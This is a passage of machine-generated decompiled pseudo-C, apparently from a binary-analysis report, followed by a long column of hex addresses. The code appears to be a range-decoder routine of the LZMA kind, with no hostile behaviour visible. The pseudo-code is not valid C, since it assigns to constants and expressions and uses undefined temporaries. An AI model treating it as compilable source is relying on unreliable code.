												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                  0x00000000
                                                  0x00406969
                                                  0x00406969
                                                  0x0040696d
                                                  0x00406992
                                                  0x0040699c
                                                  0x00000000
                                                  0x0040696f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x0040697c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00000000
                                                  0x00406ba3
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x00000000
                                                  0x004063c0
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
